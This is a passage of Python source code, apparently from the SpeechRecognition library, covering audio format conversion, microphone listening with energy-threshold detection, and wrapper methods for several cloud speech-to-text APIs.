sample_width = self.sample_width if convert_width is None else convert_width
# generate the WAV file contents
with io.BytesIO() as wav_file:
wav_writer = wave.open(wav_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
wav_writer.setframerate(sample_rate)
wav_writer.setsampwidth(sample_width)
wav_writer.setnchannels(1)
wav_writer.writeframes(raw_data)
wav_data = wav_file.getvalue()
finally: # make sure resources are cleaned up
wav_writer.close()
return wav_data
def get_aiff_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the contents of an AIFF-C file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `AIFF-C file <https://en.wikipedia.org/wiki/Audio_Interchange_File_Format>`__.
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
sample_width = self.sample_width if convert_width is None else convert_width
        # the AIFF format is big-endian, so we need to convert the little-endian raw data to big-endian
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4
raw_data = audioop.byteswap(raw_data, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
raw_data = raw_data[sample_width - 1::-1] + b"".join(raw_data[i + sample_width:i:-1] for i in range(sample_width - 1, len(raw_data), sample_width))
# generate the AIFF-C file contents
with io.BytesIO() as aiff_file:
aiff_writer = aifc.open(aiff_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
aiff_writer.setframerate(sample_rate)
aiff_writer.setsampwidth(sample_width)
aiff_writer.setnchannels(1)
aiff_writer.writeframes(raw_data)
aiff_data = aiff_file.getvalue()
finally: # make sure resources are cleaned up
aiff_writer.close()
return aiff_data
def get_flac_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the contents of a FLAC file containing the audio represented by the ``AudioData`` instance.
Note that 32-bit FLAC is not supported. If the audio data is 32-bit and ``convert_width`` is not specified, then the resulting FLAC will be a 24-bit FLAC.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `FLAC file <https://en.wikipedia.org/wiki/FLAC>`__.
"""
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 3), "Sample width to convert to must be between 1 and 3 inclusive"
        if self.sample_width > 3 and convert_width is None:  # resulting WAV data would be 32-bit, which is not convertible to FLAC using our encoder
convert_width = 3 # the largest supported sample width is 24-bit, so we'll limit the sample width to that
# run the FLAC converter with the WAV data to get the FLAC data
wav_data = self.get_wav_data(convert_rate, convert_width)
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting FLAC file in stdout, and make sure it's not mixed with any program output
"--best", # highest level of compression available
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
flac_data, stderr = process.communicate(wav_data)
return flac_data
class Recognizer(AudioSource):
def __init__(self):
"""
Creates a new ``Recognizer`` instance, which represents a collection of speech recognition functionality.
"""
self.energy_threshold = 300 # minimum audio energy to consider for recording
self.dynamic_energy_threshold = True
self.dynamic_energy_adjustment_damping = 0.15
self.dynamic_energy_ratio = 1.5
self.pause_threshold = 0.8 # seconds of non-speaking audio before a phrase is considered complete
self.operation_timeout = None # seconds after an internal operation (e.g., an API request) starts before it times out, or ``None`` for no timeout
self.phrase_threshold = 0.3 # minimum seconds of speaking audio before we consider the speaking audio a phrase - values below this are ignored (for filtering out clicks and pops)
self.non_speaking_duration = 0.5 # seconds of non-speaking audio to keep on both sides of the recording
def record(self, source, duration=None, offset=None):
"""
Records up to ``duration`` seconds of audio from ``source`` (an ``AudioSource`` instance) starting at ``offset`` (or at the beginning if not specified) into an ``AudioData`` instance, which it returns.
If ``duration`` is not specified, then it will record until there is no more audio input.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before recording, see documentation for ``AudioSource``; are you using ``source`` outside of a ``with`` statement?"
frames = io.BytesIO()
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
offset_time = 0
offset_reached = False
while True: # loop for the total number of chunks needed
if offset and not offset_reached:
offset_time += seconds_per_buffer
if offset_time > offset:
offset_reached = True
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break
if offset_reached or not offset:
elapsed_time += seconds_per_buffer
if duration and elapsed_time > duration: break
frames.write(buffer)
frame_data = frames.getvalue()
frames.close()
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
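    # e.g., recognizer.record(source, duration=5, offset=2) skips the first 2 seconds of
    # ``source`` and returns the following 5 seconds as an ``AudioData`` instance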
def adjust_for_ambient_noise(self, source, duration=1):
"""
Adjusts the energy threshold dynamically using audio from ``source`` (an ``AudioSource`` instance) to account for ambient noise.
Intended to calibrate the energy threshold with the ambient energy level. Should be used on periods of audio without speech - will stop early if any speech is detected.
The ``duration`` parameter is the maximum number of seconds that it will dynamically adjust the threshold for before returning. This value should be at least 0.5 in order to get a representative sample of the ambient noise.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before adjusting, see documentation for ``AudioSource``; are you using ``source`` outside of a ``with`` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
# adjust energy threshold until a phrase starts
while True:
elapsed_time += seconds_per_buffer
if elapsed_time > duration: break
buffer = source.stream.read(source.CHUNK)
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
# dynamically adjust the energy threshold using asymmetric weighted average
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
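            # e.g., with the default damping of 0.15 and a 0.064 s buffer (1024 frames at
            # 16 kHz), damping ** seconds_per_buffer is about 0.886, so each buffer moves
            # the threshold roughly 11% of the way toward energy * dynamic_energy_ratio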
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
def listen(self, source, timeout=None, phrase_time_limit=None):
"""
Records a single phrase from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance, which it returns.
This is done by waiting until the audio has an energy above ``recognizer_instance.energy_threshold`` (the user has started speaking), and then recording until it encounters ``recognizer_instance.pause_threshold`` seconds of non-speaking or there is no more audio input. The ending silence is not included.
The ``timeout`` parameter is the maximum number of seconds that this will wait for a phrase to start before giving up and throwing an ``speech_recognition.WaitTimeoutError`` exception. If ``timeout`` is ``None``, there will be no wait timeout.
        The ``phrase_time_limit`` parameter is the maximum number of seconds that this will allow a phrase to continue before stopping and returning the part of the phrase processed before the time limit was reached. The resulting audio will be the phrase cut off at the time limit. If ``phrase_time_limit`` is ``None``, there will be no phrase time limit.
        This operation will always complete within ``timeout + phrase_time_limit`` seconds if both are numbers, either by returning the audio data, or by raising an exception.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before listening, see documentation for ``AudioSource``; are you using ``source`` outside of a ``with`` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
pause_buffer_count = int(math.ceil(self.pause_threshold / seconds_per_buffer)) # number of buffers of non-speaking audio during a phrase, before the phrase should be considered complete
phrase_buffer_count = int(math.ceil(self.phrase_threshold / seconds_per_buffer)) # minimum number of buffers of speaking audio before we consider the speaking audio a phrase
non_speaking_buffer_count = int(math.ceil(self.non_speaking_duration / seconds_per_buffer)) # maximum number of buffers of non-speaking audio to retain before and after a phrase
# read audio input for phrases until there is a phrase that is long enough
elapsed_time = 0 # number of seconds of audio read
buffer = b"" # an empty buffer means that the stream has ended and there is no data left to read
while True:
frames = collections.deque()
# store audio input until the phrase starts
while True:
# handle waiting too long for phrase by raising an exception
elapsed_time += seconds_per_buffer
if timeout and elapsed_time > timeout:
raise WaitTimeoutError("listening timed out while waiting for phrase to start")
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
if len(frames) > non_speaking_buffer_count: # ensure we only keep the needed amount of non-speaking buffers
frames.popleft()
# detect whether speaking has started on audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold: break
# dynamically adjust the energy threshold using asymmetric weighted average
if self.dynamic_energy_threshold:
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
# read audio input until the phrase ends
pause_count, phrase_count = 0, 0
phrase_start_time = elapsed_time
while True:
# handle phrase being too long by cutting off the audio
elapsed_time += seconds_per_buffer
if phrase_time_limit and elapsed_time - phrase_start_time > phrase_time_limit:
break
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
phrase_count += 1
# check if speaking has stopped for longer than the pause threshold on the audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # unit energy of the audio signal within the buffer
if energy > self.energy_threshold:
pause_count = 0
else:
pause_count += 1
if pause_count > pause_buffer_count: # end of the phrase
break
# check how long the detected phrase is, and retry listening if the phrase is too short
phrase_count -= pause_count # exclude the buffers for the pause before the phrase
if phrase_count >= phrase_buffer_count or len(buffer) == 0: break # phrase is long enough or we've reached the end of the stream, so stop listening
# obtain frame data
for i in range(pause_count - non_speaking_buffer_count): frames.pop() # remove extra non-speaking frames at the end
frame_data = b"".join(list(frames))
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
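    # Usage sketch (assumes PyAudio is installed):
    #
    #   r = Recognizer()
    #   with Microphone() as source:
    #       r.adjust_for_ambient_noise(source)  # calibrate the energy threshold on ~1 s of ambient noise
    #       audio = r.listen(source)            # blocks until a complete phrase is captured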
def listen_in_background(self, source, callback, phrase_time_limit=None):
"""
        Spawns a thread to repeatedly record phrases from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance and call ``callback`` with that ``AudioData`` instance as soon as each phrase is detected.
Returns a function object that, when called, requests that the background listener thread stop, and waits until it does before returning. The background thread is a daemon and will not stop the program from exiting if there are no other non-daemon threads.
Phrase recognition uses the exact same mechanism as ``recognizer_instance.listen(source)``. The ``phrase_time_limit`` parameter works in the same way as the ``phrase_time_limit`` parameter for ``recognizer_instance.listen(source)``, as well.
        The ``callback`` parameter is a function that should accept two parameters - the ``recognizer_instance``, and an ``AudioData`` instance representing the captured audio. Note that the ``callback`` function will be called from a non-main thread.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
running = [True]
def threaded_listen():
with source as s:
while running[0]:
try: # listen for 1 second, then check again if the stop function has been called
audio = self.listen(s, 1)
except WaitTimeoutError: # listening timed out, just try again
pass
else:
if running[0]: callback(self, audio)
def stopper():
running[0] = False
listener_thread.join() # block until the background thread is done, which can be up to 1 second
listener_thread = threading.Thread(target=threaded_listen)
listener_thread.daemon = True
listener_thread.start()
return stopper
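    # Usage sketch (the callback body is hypothetical):
    #
    #   stop = r.listen_in_background(Microphone(), lambda rec, audio: print("phrase captured"))
    #   time.sleep(10)  # the daemon thread keeps listening while the main thread works
    #   stop()          # asks the listener thread to stop and waits for it to exit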
def recognize_sphinx(self, audio_data, language="en-US", keyword_entries=None, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using CMU Sphinx.
        The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` or ``"en-GB"``, defaulting to US English. Out of the box, only ``en-US`` is supported. See `Notes on using PocketSphinx <https://github.com/Uberi/speech_recognition/blob/master/reference/pocketsphinx.rst>`__ for information about installing other languages. This document is also included under ``reference/pocketsphinx.rst``.
If specified, the keywords to search for are determined by ``keyword_entries``, an iterable of tuples of the form ``(keyword, sensitivity)``, where ``keyword`` is a phrase, and ``sensitivity`` is how sensitive to this phrase the recognizer should be, on a scale of 0 (very insensitive, more false negatives) to 1 (very sensitive, more false positives) inclusive. If not specified or ``None``, no keywords are used and Sphinx will simply transcribe whatever words it recognizes. Specifying ``keyword_entries`` is more accurate than just looking for those same keywords in non-keyword-based transcriptions, because Sphinx knows specifically what sounds to look for.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the Sphinx ``pocketsphinx.pocketsphinx.Decoder`` object resulting from the recognition.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if there are any issues with the Sphinx installation.
"""
assert isinstance(audio_data, AudioData), "``audio_data`` must be audio data"
assert isinstance(language, str), "``language`` must be a string"
assert keyword_entries is None or all(isinstance(keyword, str) and 0 <= sensitivity <= 1 for keyword, sensitivity in keyword_entries), "``keyword_entries`` must be ``None`` or a list of pairs of strings and numbers between 0 and 1"
# import the PocketSphinx speech recognition module
try:
from pocketsphinx import pocketsphinx
except ImportError:
raise RequestError("missing PocketSphinx module: ensure that PocketSphinx is set up correctly.")
except ValueError:
raise RequestError("bad PocketSphinx installation detected; make sure you have PocketSphinx version 0.0.9 or better.")
language_directory = os.path.join(os.path.dirname(os.path.realpath(__file__)), "pocketsphinx-data", language)
if not os.path.isdir(language_directory):
raise RequestError("missing PocketSphinx language data directory: \"{}\"".format(language_directory))
acoustic_parameters_directory = os.path.join(language_directory, "acoustic-model")
if not os.path.isdir(acoustic_parameters_directory):
raise RequestError("missing PocketSphinx language model parameters directory: \"{}\"".format(acoustic_parameters_directory))
language_model_file = os.path.join(language_directory, "language-model.lm.bin")
if not os.path.isfile(language_model_file):
raise RequestError("missing PocketSphinx language model file: \"{}\"".format(language_model_file))
phoneme_dictionary_file = os.path.join(language_directory, "pronounciation-dictionary.dict")
if not os.path.isfile(phoneme_dictionary_file):
raise RequestError("missing PocketSphinx phoneme dictionary file: \"{}\"".format(phoneme_dictionary_file))
# create decoder object
config = pocketsphinx.Decoder.default_config()
config.set_string("-hmm", acoustic_parameters_directory) # set the path of the hidden Markov model (HMM) parameter files
config.set_string("-lm", language_model_file)
config.set_string("-dict", phoneme_dictionary_file)
config.set_string("-logfn", os.devnull) # disable logging (logging causes unwanted output in terminal)
decoder = pocketsphinx.Decoder(config)
# obtain audio data
raw_data = audio_data.get_raw_data(convert_rate=16000, convert_width=2) # the included language models require audio to be 16-bit mono 16 kHz in little-endian format
# obtain recognition results
if keyword_entries is not None: # explicitly specified set of keywords
with tempfile_TemporaryDirectory() as temp_directory:
                # generate a keywords file - Sphinx documentation recommends sensitivities between 1e-50 and 1e-5
keywords_path = os.path.join(temp_directory, "keyphrases.txt")
with open(keywords_path, "w") as f:
f.writelines("{} /1e{}/\n".format(keyword, 100 * sensitivity - 110) for keyword, sensitivity in keyword_entries)
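                    # e.g., sensitivity 0.6 maps to a keyword threshold of /1e-50/ and
                    # sensitivity 1.0 to /1e-10/, per the 100 * sensitivity - 110 exponent above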
                # perform the speech recognition with the keywords file (this is inside the context manager so the file isn't deleted until we're done)
decoder.set_kws("keywords", keywords_path)
decoder.set_search("keywords")
decoder.start_utt() # begin utterance processing
decoder.process_raw(raw_data, False, True) # process audio data with recognition enabled (no_search = False), as a full utterance (full_utt = True)
decoder.end_utt() # stop utterance processing
else: # no keywords, perform freeform recognition
decoder.start_utt() # begin utterance processing
decoder.process_raw(raw_data, False, True) # process audio data with recognition enabled (no_search = False), as a full utterance (full_utt = True)
decoder.end_utt() # stop utterance processing
if show_all: return decoder
# return results
hypothesis = decoder.hyp()
if hypothesis is not None: return hypothesis.hypstr
raise UnknownValueError() # no transcriptions available
def recognize_google(self, audio_data, key=None, language="en-US", show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Speech Recognition API.
The Google Speech Recognition API key is specified by ``key``. If not specified, it uses a generic key that works out of the box. This should generally be used for personal or testing purposes only, as it **may be revoked by Google at any time**.
        To obtain your own API key, simply follow the steps on the `API Keys <http://www.chromium.org/developers/how-tos/api-keys>`__ page at the Chromium Developers site. In the Google Developers Console, Google Speech Recognition is listed as "Speech API".
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in this `StackOverflow answer <http://stackoverflow.com/a/14302134>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "``audio_data`` must be audio data"
assert key is None or isinstance(key, str), "``key`` must be ``None`` or a string"
assert isinstance(language, str), "``language`` must be a string"
flac_data = audio_data.get_flac_data(
convert_rate=None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width=2 # audio samples must be 16-bit
)
if key is None: key = "AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw"
url = "http://www.google.com/speech-api/v2/recognize?{}".format(urlencode({
"client": "chromium",
"lang": language,
"key": key,
}))
request = Request(url, data=flac_data, headers={"Content-Type": "audio/x-flac; rate={}".format(audio_data.sample_rate)})
# obtain audio transcription results
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
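        # the body is one JSON object per line; a successful response typically looks
        # roughly like (transcript hypothetical):
        #   {"result":[]}
        #   {"result":[{"alternative":[{"transcript":"hello world"}],"final":true}],"result_index":0}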
# ignore any blank blocks
actual_result = []
for line in response_text.split("\n"):
if not line: continue
result = json.loads(line)["result"]
if len(result) != 0:
actual_result = result[0]
break
# return results
if show_all: return actual_result
if "alternative" not in actual_result: raise UnknownValueError()
for entry in actual_result["alternative"]:
if "transcript" in entry:
return entry["transcript"]
raise UnknownValueError() # no transcriptions available
def recognize_google_cloud(self, audio_data, language="en-US", preferred_phrases=None, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Cloud Speech API.
This requires a Google Cloud Platform account; see the `Google Cloud Speech API Quickstart <https://cloud.google.com/speech/docs/getting-started>`__ for details and instructions.
The recognition language is determined by ``language``, which is a BCP-47 language tag like ``"en-US"`` (US English). For more information see the `RecognitionConfig documentation <https://cloud.google.com/speech/reference/rest/v1beta1/RecognitionConfig>`__.
If ``preferred_phrases`` is a list of phrase strings, those given phrases will be more likely to be recognized over similar-sounding alternatives. This is useful for things like keyword/command recognition or adding new phrases that aren't in Google's vocabulary. Note that the API imposes certain `restrictions on the list of phrase strings <https://cloud.google.com/speech/limits#content>`__.
Returns the most likely transcription if ``show_all`` is False (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the credentials aren't valid, or if there is no Internet connection.
"""
assert isinstance(audio_data, AudioData), "`audio_data` must be audio data"
assert isinstance(language, str), "`language` must be a string"
        assert preferred_phrases is None or all(isinstance(preferred_phrase, str) for preferred_phrase in preferred_phrases), "``preferred_phrases`` must be a list of strings"
# See https://cloud.google.com/speech/reference/rest/v1beta1/RecognitionConfig
flac_data = audio_data.get_flac_data(
convert_rate=None if 8000 <= audio_data.sample_rate <= 48000 else max(8000, min(audio_data.sample_rate, 48000)), # audio sample rate must be between 8 kHz and 48 kHz inclusive - clamp sample rate into this range
convert_width=2 # audio samples must be 16-bit
)
speech_service = self.get_speech_service()
if preferred_phrases is None:
speech_config = {"encoding": "FLAC", "sampleRate": audio_data.sample_rate, "languageCode": language}
else:
speech_config = {"encoding": "FLAC", "sampleRate": audio_data.sample_rate, "languageCode": language, "speechContext": {"phrases": preferred_phrases}}
request = speech_service.speech().syncrecognize(body={"audio": {"content": base64.b64encode(flac_data).decode("utf8")}, "config": speech_config})
import googleapiclient.errors
try:
response = request.execute()
except googleapiclient.errors.HttpError as e:
raise RequestError(e)
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
if show_all: return response
if "results" not in response or len(response["results"]) == 0: raise UnknownValueError()
transcript = ""
for result in response["results"]:
transcript += result["alternatives"][0]["transcript"].strip() + " "
return transcript
@staticmethod
def get_speech_service():
try:
from oauth2client.client import GoogleCredentials
from googleapiclient.discovery import build
credentials = GoogleCredentials.get_application_default()
return build("speech", "v1beta1", credentials=credentials)
except ImportError:
raise ImportError("Could not find google-api-python-client; check "
"installation")
def recognize_wit(self, audio_data, key, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Wit.ai API.
The Wit.ai API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://wit.ai/>`__ and creating an app. You will need to add at least one intent to the app before you can see the API key, though the actual intent settings don't matter.
To get the API key for a Wit.ai app, go to the app's overview page, go to the section titled "Make an API request", and look for something along the lines of ``Authorization: Bearer XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX``; ``XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`` is the API key. Wit.ai API keys are 32-character uppercase alphanumeric strings.
The recognition language is configured in the Wit.ai app settings.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://wit.ai/docs/http/20141022#get-intent-via-text-link>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "``key`` must be a string"
wav_data = audio_data.get_wav_data(
convert_rate=None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width=2 # audio samples should be 16-bit
)
url = "https://api.wit.ai/speech?v=20160526"
request = Request(url, data=wav_data, headers={"Authorization": "Bearer {}".format(key), "Content-Type": "audio/wav"})
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "_text" not in result or result["_text"] is None: raise UnknownValueError()
return result["_text"]
def recognize_bing(self, audio_data, key, language="en-US", show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Microsoft Bing Voice Recognition API.
The Microsoft Bing Voice Recognition API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://www.microsoft.com/cognitive-services/en-us/speech-api>`__ with Microsoft Cognitive Services.
To get the API key, go to the `Microsoft Cognitive Services subscriptions overview <https://www.microsoft.com/cognitive-services/en-us/subscriptions>`__, go to the entry titled "Speech", and look for the key under the "Keys" column. Microsoft Bing Voice Recognition API keys are 32-character lowercase hexadecimal strings.
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in the `API documentation <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-4-supported-locales>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-3-voice-recognition-responses>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "``key`` must be a string"
assert isinstance(language, str), "``language`` must be a string"
access_token, expire_time = getattr(self, "bing_cached_access_token", None), getattr(self, "bing_cached_access_token_expiry", None)
allow_caching = True
try:
from time import monotonic # we need monotonic time to avoid being affected by system clock changes, but this is only available in Python 3.3+
except ImportError:
try:
from monotonic import monotonic # use time.monotonic backport for Python 2 if available (from https://pypi.python.org/pypi/monotonic)
except (ImportError, RuntimeError):
expire_time = None # monotonic time not available, don't cache access tokens
allow_caching = False # don't allow caching, since monotonic time isn't available
if expire_time is None or monotonic() > expire_time: # caching not enabled, first credential request, or the access token from the previous one expired
# get an access token using OAuth
credential_url = "https://api.cognitive.microsoft.com/sts/v1.0/issueToken"
credential_request = Request(credential_url, data=b"", headers={
"Content-type": "application/x-www-form-urlencoded",
"Content-Length": "0",
"Ocp-Apim-Subscription-Key": key,
})
if allow_caching:
start_time = monotonic()
try:
credential_response = urlopen(credential_request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
access_token = credential_response.read().decode("utf-8")
if allow_caching:
# save the token for the duration it is valid for
self.bing_cached_access_token = access_token
self.bing_cached_access_token_expiry = start_time + 600 # according to https://www.microsoft.com/cognitive-services/en-us/Speech-api/documentation/API-Reference-REST/BingVoiceRecognition, the token expires in exactly 10 minutes
wav_data = audio_data.get_wav_data(
convert_rate=16000, # audio samples must be 8kHz or 16 kHz
convert_width=2 # audio samples should be 16-bit
)
url = "https://speech.platform.bing.com/recognize/query?{}".format(urlencode({
"version": "3.0",
"requestid": uuid.uuid4(),
"appID": "D4D52672-91D7-4C74-8AD8-42B1D98141A5",
"format": "json",
"locale": language,
"device.os": "wp7",
"scenarios": "ulm",
"instanceid": uuid.uuid4(),
"result.profanitymarkup": "0",
}))
request = Request(url, data=wav_data, headers={
"Authorization": "Bearer {}".format(access_token),
"Content-Type": "audio/wav; samplerate=16000; sourcerate={}; trustsourcerate=true".format(audio_data.sample_rate),
})
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "header" not in result or "lexical" not in result["header"]: raise UnknownValueError()
return result["header"]["lexical"]
def recognize_houndify(self, audio_data, client_id, client_key, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Houndify API.
The Houndify client ID and client key are specified by ``client_id`` and ``client_key``, respectively. Unfortunately, these are not available without `signing up for an account <https://www.houndify.com/signup>`__. Once logged into the `dashboard <https://www.houndify.com/dashboard>`__, you will want to select "Register a new client", and fill in the form as necessary. When at the "Enable Domains" page, enable the "Speech To Text Only" domain, and then select "Save & Continue".
To get the client ID and client key for a Houndify client, go to the `dashboard <https://www.houndify.com/dashboard>`__ and select the client's "View Details" link. On the resulting page, the client ID and client key will be visible. Client IDs and client keys are both Base64-encoded strings.
Currently, only English is supported as a recognition language.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(client_id, str), "``client_id`` must be a string"
assert isinstance(client_key, str), "``client_key`` must be a string"
wav_data = audio_data.get_wav_data(
convert_rate=None if audio_data.sample_rate in [8000, 16000] else 16000, # audio samples must be 8 kHz or 16 kHz
convert_width=2 # audio samples should be 16-bit
)
url = "https://api.houndify.com/v1/audio"
user_id, request_id = str(uuid.uuid4()), str(uuid.uuid4())
request_time = str(int(time.time()))
request_signature = base64.urlsafe_b64encode(
hmac.new(
base64.urlsafe_b64decode(client_key),
user_id.encode("utf-8") + b";" + request_id.encode("utf-8") + request_time.encode("utf-8"),
hashlib.sha256
).digest() # get the HMAC digest as bytes
).decode("utf-8")
request = Request(url, data=wav_data, headers={
"Content-Type": "application/json",
"Hound-Request-Info": json.dumps({"ClientID": client_id, "UserID": user_id}),
"Hound-Request-Authentication": "{};{}".format(user_id, request_id),
"Hound-Client-Authentication": "{};{};{}".format(client_id, request_time, request_signature)
})
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "Disambiguation" not in result or result["Disambiguation"] is None:
raise UnknownValueError()
        return result["Disambiguation"]["ChoiceData"][0]["Transcription"]
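    # The Houndify request above authenticates by signing the message
    # "<user_id>;<request_id><request_time>" with the URL-safe-Base64-decoded
    # client key. A standalone sketch of the same computation (all inputs are
    # placeholders):
    #
    #     import base64, hashlib, hmac
    #     message = user_id + ";" + request_id + request_time
    #     signature = base64.urlsafe_b64encode(hmac.new(
    #         base64.urlsafe_b64decode(client_key),
    #         message.encode("utf-8"),
    #         hashlib.sha256
    #     ).digest()).decode("utf-8")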
def recognize_ibm(self, audio_data, username, password, language="en-US", show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the IBM Speech to Text API.
